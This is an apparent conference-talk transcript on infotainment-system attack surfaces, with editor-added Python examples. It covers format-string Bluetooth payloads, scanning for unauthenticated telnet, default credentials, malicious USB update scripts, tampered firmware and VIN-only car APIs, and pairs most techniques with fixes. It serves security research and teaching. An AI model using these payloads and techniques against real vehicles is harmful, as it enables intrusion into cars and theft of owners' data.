My topic is car infotainment hacking methodology and attack surface scenarios, so it's IVI, in-vehicle infotainment, also called ICE, in-car entertainment. My name is Jay; that's my Twitter handle. I work as an application security engineer at Bugcrowd. Shout out to my colleagues. That's my day job, but in the Philippines we organize ROOTCON, which is the hacker conference in the Philippines. We also contributed some tools. I love playing games. I'm not the creator of the Turla malware, despite my family name, because I'm not even Russian. And I love to party; who doesn't, right?

Before anything else we need that inspirational quote, or whatever you think about it: it's not about the ride, it's the rider.

So here's our scope and limitations, so that you won't be disappointed with what this topic is all about. First of all, IVI, or in-vehicle infotainment systems, is what you have in the dashboard of modern cars: anything you can play your videos and music with. You don't need to touch your phone; you can connect your phone to it and make calls through it, something like that. So it's purely infotainment bugs and their attack surfaces: what are the common vulnerabilities for infotainment? There's no CAN bus hacking, sorry for that, but if you want to learn that there's also the Car Hacking Village. It's methodology and security bugs, but not full takeover of the car, because infotainment systems sometimes have limitations: there are some vehicles where you can control the steering wheel from it, but in some cases it's in a separate module, so it's sandboxed and different. In fact there are also IVIs which are third-party add-ons for your car.
It's very much inspired by what Jason Haddix wrote in his GitHub and presented at DEF CON, the Bug Hunter's Methodology, but in my case it's how to find bugs in an IVI. So I'm probably going to miss some attack surfaces; if you know anything, stop me, or maybe you can share it with the audience.

From The Car Hacker's Handbook by Craig Smith, these are the common attack surfaces that you have in your car. Those are the most common things you can use to exploit your car. Some of these entry points you can use to maybe take over the car, or play some videos on it, or crash the system, something like that, or install malicious firmware on the IVI. But in this talk these are the attack surfaces that we have: we have Bluetooth; we have Wi-Fi; USB ports, because that's where you charge your phone or sometimes play your music from a USB flash drive; SD card slots, for updating the maps of the GPS or loading something, probably apps; the CD-ROM or DVD-ROM, where you also play videos or music, or your DEF CON CD that you have to play that music; and we also have the touchscreen. Even though you need physical access to it, it's also an attack surface, an entry point for hackers. It allows you to control the console, of course, and there are things you can do just by touching the touchscreen of a dashboard. The audio jack: I don't have any proof of concept for this yet, but probably you could short out something in the IVI. And then we have the cellular connection, the GPS, etc.

So for Bluetooth, they say everything's better with Bluetooth. Not really. For cars, for IVI, it comes coupled with Bluetooth vulnerabilities. I think two weeks ago there was a new Bluetooth vulnerability. You can jam: most IVIs have Bluetooth, right, to connect your phone to your car and play some music or call someone, anything, GPS also, so you can jam the Bluetooth so that the owner of the car can't play his songs, or Justin Bieber songs. There's also code execution: you can execute arbitrary commands on an IVI over Bluetooth, but I haven't seen a PoC for this yet; maybe it will come out from other hackers in the Car Hacking Village. And of course the default pairing numbers for Bluetooth: we have 0000, 1111, 1234 or whatever.

So those are the things you can do: pairing numbers, or malformed input, or format string vulnerabilities. With this kind of format you can actually break the system or crash the system, or probably get taken to the desktop mode of the IVI, for example if it runs on Windows ME or whatever it runs, because if it's only a sandboxed app, it could take you to a desktop. There's also memory corruption: send malformed packets to the head unit and you can also crash the Bluetooth stack. So you have format string specifiers in a device name: you can rename your phone with this percentage sign, it's a format string. CVE-2017-9212 was assigned to a 2011 BMW 330i; the researcher was from IOActive. So, like I said, test at your own risk. What if, like I said, it takes you to the desktop environment or the debug options of your IVI? This guy tweeted it on Twitter: basically set your smartphone's name to %x%x, or %c, or percent anything, a format string, and connect the devices. So here's a 2011 BMW 330i, and what he did is he was able to crash his car and break his system. So you have badges, right? You can go to the people who have their cars there right now, connect to them over Bluetooth, and if you don't know any payloads you can go to SecLists, which is a GitHub repo where you can get some payloads. Or you can fuzz: you can rename your phone, your address book, or the song titles of your MP3s or something like that; you just need to go to this repo. "Fuzzing for format string vulnerabilities", or strings, is by Jason Haddix and Daniel Miessler.

Okay, Wi-Fi. After Bluetooth we have Wi-Fi: "when Wi-Fi is down and all you have is imagination." So if there's Wi-Fi, of course, common Wi-Fi vulnerabilities, right? You can deauth the device so that he can't connect to the Wi-Fi. For example, there are some IVIs that allow you to connect them to your Wi-Fi, and you know what happens after: it will have an IP address, you can do something with it, and we'll talk about that later. There is also a way to update your car: in one of the settings, update your firmware, right? So if it's connected to your own network and you press update, why don't you try to sniff the packets and check where the firmware came from. You can also change the firmware if it doesn't have firmware signature validation, so you can reverse the firmware and then maybe send a backdoored firmware to someone's car. You can also connect to the Wi-Fi, fetch the IP address, and then, if it's in your network now, what are you going to do? You just need to scan your network, or if you own the network you can see the hostname in the router. So just port-scan the IP address you have: what services does it have, what services does your car have for the IVI? Does it have FTP, does it have telnet, does it have SSH? If it does have telnet, and the guy that owns the car is also a hacker or maybe a techie person, and he logged in with his credentials, you can actually sniff the credentials because it's insecure telnet and FTP, for example. Some of these interfaces have no authentication at all.
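The Bluetooth device-name format-string test from earlier in the talk, written out as an added example (this is editor-added code, not from the talk or from SecLists): a generator for the names you would set on your own phone before pairing, and the check a head unit should run on a peer's name before it reaches any printf-style call. Assumptions not stated in the talk: a Bluetooth Classic friendly name is at most 248 bytes of UTF-8, so every payload is kept within that, and the specifiers are the standard C printf set. Test only against a unit you own or are authorized to test.

```python
"""
Added example (not from the talk or from SecLists): Bluetooth device-name
payloads for a printf(name) bug, and the sanitizer a head unit should apply.
Assumption: BR/EDR friendly names are at most 248 bytes of UTF-8.
"""
import re

MAX_NAME_BYTES = 248  # BR/EDR friendly-name limit; assumption about the target

# One printf conversion: flags, width, precision, length modifier, conversion char.
# '%%' is deliberately not in the set; it is a literal percent, handled below.
_SPEC_RE = re.compile(r"%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|j|z|t|L)?[diouxXeEfFgGaAcspn]")


def format_string_payloads(prefix: str = "", repeats=(1, 8, 32)) -> list:
    """Device names that trigger a printf(name) bug, each within MAX_NAME_BYTES.
    %x/%p leak stack words, %s dereferences them, %n writes, %.1000d forces a
    long write; a harmless prefix keeps the name plausible in the pairing UI."""
    seeds = ["%x", "%s", "%p", "%n", "%c", "%08x", "%.1000d"]
    out = []
    for spec in seeds:
        for n in repeats:
            name = prefix + spec * n
            if len(name.encode("utf-8")) <= MAX_NAME_BYTES:
                out.append(name)
    marker = prefix + "AAAA" + "%08x." * 10  # makes leaked stack words easy to spot
    if len(marker.encode("utf-8")) <= MAX_NAME_BYTES:
        out.append(marker)
    return list(dict.fromkeys(out))  # de-duplicate, keep order


def contains_format_specifier(name: str) -> bool:
    """True if printf(name) would consume arguments; a '%%' pair does not count.
    Note that "100% sure" counts: '% s' is the space flag plus %s."""
    i = 0
    while i < len(name):
        if name[i] != "%":
            i += 1
        elif name.startswith("%%", i):
            i += 2
        elif _SPEC_RE.match(name, i):
            return True
        else:
            i += 1
    return False


def sanitize_peer_name(name: str) -> str:
    """What the head unit should do with a peer's name: truncate, then escape
    '%' so the name is harmless even if some logger uses it as a format string.
    The real fix is printf("%s", name); this is defence in depth for the rest."""
    return name[:MAX_NAME_BYTES].replace("%", "%%")


if __name__ == "__main__":
    for p in format_string_payloads("Pixel"):
        print(repr(p))
```

Set one payload at a time as the phone's name, pair, and watch the unit; a crash, a leaked hex dump in the paired-devices list, or a drop to a debug screen is the finding, and the sanitizer shows what the vendor fix looks like on the receiving side.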
Others have authentication but weak passwords, so netcat is your friend. Exploit there; if there are other services, check whether it runs older service versions, pretty much like the penetration testing methodology that you learned. This is from my car. If it has a weak password, try brute-forcing the credentials, right? For example, if there's SSH, try to brute-force the credentials, or if you know the default password you can try it, so get to know the default password of the system. This is from a 2017 Mazda, and it has SSH open, and that's the default password. There's a video of it, just to prove it's real. It's not complete, it's just the shell. I'm kind of slow at typing because I was holding my camera. It runs on Linux, and I didn't continue from there, just to let you know that there are things under the JCI. This was reported, so if there are people from Mazda here, don't sue me; this is reported already, I value responsible disclosure.

Another case: Daan Keuper and Thijs Alkemade from Computest gained access to the IVI's root account on Volkswagen and Audi. This is the link to their report. They didn't give enough details or a PoC for the attack, but they have an exploit: by just knowing the IP address, connected to the same network, they have their own exploit.sh. What you can see is that he was able to execute uname -a, it's running on QNX, and look at the board, it's an NVIDIA Tegra 2 board. And there's also this one from one of their reports: telnet, and there's the default password. So if you also have access to the network you can also sniff the credentials, because it's telnet, right? That's from Audi. Who owns an Audi here? Don't throw it away, but keep it away from hackers for now.
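The reconnaissance step the talk describes above (find the head unit's LAN address, port-scan it, see whether telnet, FTP or SSH answer, and whether the service is cleartext or drops you straight into a shell), written out as an added example; this is editor-added code, not from the talk, Computest, or any vendor. Everything is constructed so it runs offline: start_fake_head_unit() is a stand-in for the IVI's telnet daemon on 127.0.0.1, and the QNX banner, the root prompt and the port numbers are assumptions. Against a real unit you would call scan() with its address and INTERESTING_PORTS, and only on a device you own or are authorized to test.

```python
"""
Added example (not from the talk): banner-grabbing scan of an IVI's IP,
flagging cleartext services and telnet that needs no login. The "head unit"
is a constructed local listener so the demo runs offline.
"""
import socket
import threading

# Ports the talk calls out on the IVI, and which of them carry credentials in the clear.
INTERESTING_PORTS = {21: "ftp", 22: "ssh", 23: "telnet"}
CLEARTEXT_SERVICES = {"ftp", "telnet"}


def strip_telnet_iac(data: bytes) -> bytes:
    """Drop telnet option negotiation (IAC WILL/WONT/DO/DONT <opt>, IAC <cmd>)
    so the human-readable part of the banner can be inspected."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] == 0xFF and i + 1 < len(data):
            i += 3 if data[i + 1] in (0xFB, 0xFC, 0xFD, 0xFE) else 2
            continue
        out.append(data[i])
        i += 1
    return bytes(out)


def grab_banner(host: str, port: int, timeout: float = 1.0):
    """Return (is_open, raw_banner). A closed or filtered port yields (False, b'')."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            try:
                return True, s.recv(256)
            except socket.timeout:
                return True, b""  # open, but the service waits for the client to speak
    except OSError:
        return False, b""


def scan(host: str, ports: dict, timeout: float = 1.0) -> list:
    """ports maps port -> expected service name. Returns one finding per open port."""
    findings = []
    for port, service in sorted(ports.items()):
        is_open, raw = grab_banner(host, port, timeout)
        if not is_open:
            continue
        text = strip_telnet_iac(raw).strip()
        findings.append({
            "port": port,
            "service": service,
            "banner": text.decode("latin-1", "replace"),
            "cleartext": service in CLEARTEXT_SERVICES,
            "telnet_negotiation": b"\xff\xfb" in raw or b"\xff\xfd" in raw,
            # "login:"/"password:" means at least a password is in the way;
            # a bare "# " or "$ " prompt is the DS5-style no-auth shell.
            "auth_prompt": b"login" in text.lower() or b"password" in text.lower(),
            "shell_prompt": text.endswith((b"#", b"$")),
        })
    return findings


def start_fake_head_unit(banner: bytes, host: str = "127.0.0.1"):
    """Constructed stand-in for the IVI's telnet service. Returns (port, stop_fn)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    srv.settimeout(0.2)  # lets the thread notice stop() instead of blocking in accept()
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stop.set


def find_closed_port(host: str = "127.0.0.1") -> int:
    """A port nothing listens on, so the scan also exercises the closed-port path."""
    s = socket.socket()
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo() -> dict:
    """Scan two constructed head units: a telnet that drops straight into a root
    shell (no authentication, as in the DS5 case) and one that asks for a login
    (the default-password case), plus a port with nothing behind it."""
    no_auth_port, stop_a = start_fake_head_unit(b"\xff\xfb\x01\xff\xfd\x18\r\n# ")
    login_port, stop_b = start_fake_head_unit(b"\r\nQNX login: ")
    closed_port = find_closed_port()
    try:
        findings = scan("127.0.0.1", {no_auth_port: "telnet", login_port: "telnet", closed_port: "ssh"})
    finally:
        stop_a()
        stop_b()
    return {"no_auth_port": no_auth_port, "login_port": login_port,
            "closed_port": closed_port, "findings": findings}


if __name__ == "__main__":
    for f in demo()["findings"]:
        print(f)
```

A "cleartext" finding is the one to pair with a sniffer on the same Wi-Fi, as the talk suggests; a "shell_prompt" finding with no "auth_prompt" is the DS5 situation, where no credentials are needed at all.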
Okay, so key takeaways from Charlie Miller: they looked at 2015 vehicles. This is a big difference between car hacking and, say, browser hacking: a 2015 browser is an old browser, but a 2015 vehicle is still a pretty new car. In fact, if you own a 2015 Mazda, that's still a pretty new car, right? Or if you own something from 2010 and it's a very high-end car, like for example a Mercedes-Benz, it's still a pretty new car, while for a browser that's very old. I mean, some XSS payloads, for example for an XSS attack on the web, won't work anymore on a browser that old, right?

This is another one, from Ian Tabor. He showed an analysis of the IVI system in the 2015 DS5 1955 Limited Edition. He was able to connect to the device over TCP port 23; it's still telnet. The problem with this one is that it doesn't have any authentication, so just use netcat or telnet and there you go, you can already access the IVI. The things you can do there: call logs, data leakage, that sort of thing; what the driver has been doing, like where he went, because of the GPS navigation, and also some call logs they have, pretty much like that. So even though it's already 2015, some manufacturers have this kind of issue.

Next we have the USB port, or Universal Serial Bus. The things you can do: you can install malicious apps with it, you can update the firmware via USB, and you can do RCE, or remote code execution, if it's vulnerable. USB Killer, have you heard of this USB? If you plug it into your computer it destroys your computer, so maybe if you plug it in it's possible you can crash or erase the data on your IVI. In some cases, if your IVI doesn't have Wi-Fi but has a USB port, you can buy a USB-to-Ethernet adapter, so it's another way for your car to get an IP address if the Wi-Fi is locked down.

In my case, this is what I did. Owners of Mazdas have been modding and installing apps on their infotainment system using the Mazda All-In-One Tweaks from the Mazda3Revolution forum. I tried to check on what's with the app and look at how it's done. Putting it all together from the documentation (can you still hear me okay?), there's documentation that allows you to update the CMU of the car. I tried to read it, and there's actually a website for it: you just need to put what you download from that website on a USB flash drive and you can already retrieve the CMU details. In one of the files of that zip file you downloaded from their website there's actually a text file like this, and the cmd, as you can see on the last line, actually executes a shell script. So I put it all together to prove that this is what a valet can do to you: "hey, can you park my car?", and then the attacker has a USB, and that's what I did. So that's the PoC: I created a PoC in the .sh file. This is one of the snippets from the shell script; I executed uname. There's actually a video of this one; I apologize for the shakiness of the video. This is the one that I did: you can see the files, there's a USB flash drive, I was playing music; let's fast forward. From the shell script you have the echo command, and I was able to execute uname -a, it's shown on the screen. So those are some of the dangers: aside from installing apps, you can actually execute arbitrary commands on your car.
That's the code again. From the update file that you just have on your flash drive, this is one of the text files of the update; this executes info.sh, and this is what's inside the info.sh shell script: I'm calling one of the JCI tools that allows you to show something on the screen, and that's it, just to prove that there's RCE. Another case: researchers from Keen Security Lab also found local code execution via USB through an update. They were not able to show a PoC for this one, maybe because they don't allow full disclosure, just evidence of the attack that they did; there's no PoC.

It's still the same thing with an SD card slot: basically you load the same thing. If there's an update for your car, or you can update the firmware via the CD-ROM or DVD-ROM, then you can load something, right? So for Mazda, using this known CMU bug, you can actually deploy apps through the custom application SD. You can create your own apps with this one; it's free, and you can just test it.

Like I said, there's also the touchscreen as one of the attack surfaces. You just need to connect to Wi-Fi to establish an IP address, but that's for another attack, the Wi-Fi attack. For this one, if you just press anything, if you rapidly press the buttons of your car, you can actually cause an overflow. The picture below is from my uncle; this is what he got, the dialog box. It's familiar, right? When you try to close it, it takes you to the Windows desktop environment and you can actually run cmd from there. One of my friends from ROOTCON has a third-party unit in his Honda; he was not doing anything but the application just crashed, and it also took him to the Windows desktop environment, and there's a Start menu: locate cmd and do something like that.
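The update path above, both the USB/SD one (a descriptor file whose last line names a shell script) and the Wi-Fi firmware download where the talk says to check for signature validation, modelled as an added example; this is editor-added code, not from the talk, Mazda, JCI or Keen Security Lab. install_unsigned() behaves like the unit in the talk, which trusts the descriptor, so whoever writes the stick (the valet in the story) gets code execution; install_signed() checks a signature over every file first, so a modified script, or a package swapped while it was being downloaded, is refused before anything runs. Assumptions: the descriptor keys (cmd=...), the /media/update path and the contacts.db path are hypothetical stand-ins for the real format; the signature is HMAC-SHA256 with a demo key, whereas a real unit must verify a public-key signature (for example Ed25519) so that nothing extractable from the head unit can sign a package. Nothing is executed here; the functions return what would be run.

```python
"""
Added example (not from the talk or any vendor): an update package with a
descriptor naming a script, installed with and without signature validation.
Descriptor format, paths and the HMAC demo key are hypothetical.
"""
import hashlib
import hmac

VENDOR_KEY = b"demo-only-vendor-key"  # constructed; stands in for the vendor's signing key

# Constructed package, modelled on the talk's description: a text file whose
# last line names a shell script, plus the script itself.
UPDATE_FILES = {
    "update.txt": "version=1\nname=info\ncmd=/media/update/info.sh\n",
    "info.sh": "#!/bin/sh\nuname -a > /media/update/uname.txt\n",
}


def parse_descriptor(text: str) -> dict:
    """key=value lines; later keys override earlier ones; '#' lines are comments."""
    fields = {}
    for line in text.splitlines():
        if "=" in line and not line.lstrip().startswith("#"):
            k, v = line.split("=", 1)
            fields[k.strip()] = v.strip()
    return fields


def package_digest(files: dict) -> bytes:
    """SHA-256 over every file, name and length included, in a fixed order, so
    renaming, reordering or appending to any file changes the digest."""
    h = hashlib.sha256()
    for name in sorted(files):
        data = files[name].encode("utf-8")
        h.update(len(name).to_bytes(4, "big") + name.encode("utf-8"))
        h.update(len(data).to_bytes(8, "big") + data)
    return h.digest()


def sign_package(files: dict, key: bytes) -> str:
    """Vendor side: sign the digest of the whole package (HMAC as a stand-in
    for a public-key signature)."""
    return hmac.new(key, package_digest(files), hashlib.sha256).hexdigest()


def install_unsigned(files: dict) -> dict:
    """The behaviour the talk demonstrates: run whatever the descriptor names."""
    desc = parse_descriptor(files.get("update.txt", ""))
    return {"accepted": True, "would_execute": desc.get("cmd")}


def install_signed(files: dict, signature: str, key: bytes) -> dict:
    """Refuse the package unless the signature matches every byte of it; only
    then look at the descriptor, and only run something shipped in the package.
    compare_digest avoids a timing side channel on the signature check."""
    expected = sign_package(files, key)
    if not hmac.compare_digest(expected, signature):
        return {"accepted": False, "would_execute": None, "reason": "signature mismatch"}
    desc = parse_descriptor(files.get("update.txt", ""))
    cmd = desc.get("cmd")
    shipped = {"/media/update/" + name for name in files}  # hypothetical mount point
    if cmd is None or cmd not in shipped:
        return {"accepted": False, "would_execute": None, "reason": "cmd not inside package"}
    return {"accepted": True, "would_execute": cmd}


def tampered_copy(files: dict) -> dict:
    """What an attacker on the USB stick (or in the Wi-Fi download path) does:
    keep the vendor's descriptor, swap the script body. Paths are made up."""
    evil = dict(files)
    evil["info.sh"] = "#!/bin/sh\ncp /var/lib/ivi/contacts.db /media/update/\n"
    return evil


if __name__ == "__main__":
    sig = sign_package(UPDATE_FILES, VENDOR_KEY)
    print("genuine, unsigned install :", install_unsigned(UPDATE_FILES))
    print("tampered, unsigned install:", install_unsigned(tampered_copy(UPDATE_FILES)))
    print("tampered, signed install  :", install_signed(tampered_copy(UPDATE_FILES), sig, VENDOR_KEY))
```

The same check covers the Wi-Fi case: if the package downloaded by the "update firmware" setting is verified this way before installation, an attacker who intercepts and modifies it on the network gets the signature mismatch, not a backdoored head unit.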
No PoC, because at that time we were not yet interested in car security, so sorry, no PoC for this one, but it happens.

Have you seen this YouTube video, how to mod your Porsche 911 or other car to run Doom in three easy steps? Is this true? Nope, it's just a joke; he has a lot of videos. What he did is he just inserted a Doom disc and then Doom played on his Porsche, but it's not true, because he also has a prank video where he was able to run Doom on his toaster. He did a lot of prank videos and other security guys thought it was true, but it's not.

For GSM, the cellular connection, the phone app: they have an app that connects to your car, so it's time for some mobile testing for this one. You're going to try to intercept the requests, or you can use Burp on the app and see how it goes from there. There is one finding from this, where you can test the URLs you intercepted while testing the app. Troy Hunt wrote an article about this, but he didn't specify the exact URL. What it does is that from the mobile app there's an API that allows you to control the steering wheel, and he was able to intercept that one, and if you know the VIN of a certain Nissan Leaf you can actually control the steering wheel of another car. Okay, it's the Nissan Leaf. So you can eavesdrop on the connections: if you have a mobile app for your car, you can reverse engineer the app, and if you reverse engineer the app or view the source code, maybe you can get the API key. I don't have a PoC for this one, but I was able to look into one of these. So, like I said, because I work at a company that promotes responsible disclosure, I don't have a PoC for the other phone apps.
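The authorization flaw described above (a car-control API that acts on whatever VIN the app sends), as an added example with the weak handler beside a fixed one that only acts on a VIN the logged-in account owns; this is editor-added code, not from the talk, from Troy Hunt's write-up or from Nissan. Everything is constructed for the demo: the URL shape, the action names, the session table and the VINs are made up. The VIN check digit is the real North American scheme (49 CFR 565), included to make one point: VINs are structured and partly guessable (the first 11 characters describe manufacturer, model attributes, model year and plant, and the check digit prunes guesses further), so they are identifiers, never secrets, and the server must do the ownership check.

```python
"""
Added example (not from the talk, Troy Hunt or Nissan): a VIN-only car-control
API beside a fixed one that binds the VIN to the authenticated account. URL
shape, actions, sessions and VINs are constructed for the demo.
"""
from urllib.parse import urlparse, parse_qs

# VIN check digit (position 9): letters transliterate to digits, I/O/Q never appear.
_TRANS = dict(zip("ABCDEFGHJKLMNPRSTUVWXYZ",
                  [1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 7, 9, 2, 3, 4, 5, 6, 7, 8, 9]))
_WEIGHTS = [8, 7, 6, 5, 4, 3, 2, 10, 0, 9, 8, 7, 6, 5, 4, 3, 2]


def vin_check_digit(vin: str) -> str:
    """Weighted sum of the characters mod 11 (position 9 has weight 0); 10 -> 'X'."""
    total = sum((_TRANS[c] if c.isalpha() else int(c)) * w for c, w in zip(vin, _WEIGHTS))
    r = total % 11
    return "X" if r == 10 else str(r)


def vin_is_well_formed(vin: str) -> bool:
    return (len(vin) == 17
            and all(c.isdigit() or c in _TRANS for c in vin)
            and vin[8] == vin_check_digit(vin))


def with_check_digit(vin: str) -> str:
    """Fix up position 9 so a constructed VIN passes vin_is_well_formed()."""
    return vin[:8] + vin_check_digit(vin) + vin[9:]


# Constructed backend state: which account owns which VIN, and live sessions.
VIN_ALICE = with_check_digit("1N4AZ0CP0EC000001")
VIN_BOB = with_check_digit("1N4AZ0CP0EC000002")
OWNERS = {"alice": {VIN_ALICE}, "bob": {VIN_BOB}}
SESSIONS = {"tok-alice": "alice", "tok-bob": "bob"}
ALLOWED_ACTIONS = {"status", "climate_on", "climate_off"}  # hypothetical remote commands


def _params(url: str) -> tuple:
    q = parse_qs(urlparse(url).query)
    return q.get("vin", [""])[0].upper(), q.get("action", [""])[0]


def api_weak(url: str) -> dict:
    """The pattern the talk describes: the VIN in the request is the only thing
    checked, so anyone who can read a VIN off a windshield can drive the API."""
    vin, action = _params(url)
    if action not in ALLOWED_ACTIONS or not vin_is_well_formed(vin):
        return {"status": 400, "error": "bad request"}
    return {"status": 200, "vin": vin, "action": action}


def api_fixed(url: str, bearer_token: str) -> dict:
    """Same endpoint with the missing step: authenticate the caller, then act
    only on VINs bound to that account. 'Not yours' and 'not enrolled' get the
    same 403 so the endpoint cannot be used to confirm which VINs exist."""
    user = SESSIONS.get(bearer_token)
    if user is None:
        return {"status": 401, "error": "unauthenticated"}
    vin, action = _params(url)
    if action not in ALLOWED_ACTIONS or not vin_is_well_formed(vin):
        return {"status": 400, "error": "bad request"}
    if vin not in OWNERS.get(user, set()):
        return {"status": 403, "error": "forbidden"}
    return {"status": 200, "vin": vin, "action": action}


def demo() -> dict:
    """What interception with Burp would show: Alice's app's request, replayed
    with Bob's VIN, works on the weak API and is refused on the fixed one."""
    url_for_bobs_car = f"https://api.example.invalid/v1/vehicle?vin={VIN_BOB}&action=climate_on"
    return {"weak": api_weak(url_for_bobs_car),
            "fixed_as_alice": api_fixed(url_for_bobs_car, "tok-alice"),
            "fixed_as_bob": api_fixed(url_for_bobs_car, "tok-bob")}


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

When testing a real app, the check to run after intercepting the request is exactly this replay: swap in a VIN you own on a second account and see whether the server still acts on it.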
But here are some programs where you can report issues if you find bugs in your car, and earn money on some of the cars you have there: FCA on Bugcrowd, Tesla Motors, and also General Motors on HackerOne. So it's not just XSS for reporting bugs. I already did a demo on the car; that's from CSI, whatever. Sorry. Here are my references for the talk. Thank you Google for the memes, and to the researchers that have PoCs for the cars. As you can see it's really risky. My final thoughts on this: maybe limit the connectivity and don't just leave your car alone with the one who parks your car; maybe there's a vulnerability that allows you to update the firmware and steal some of the data in your car. Those are my references, and that's it, just a short talk, but if you have any questions...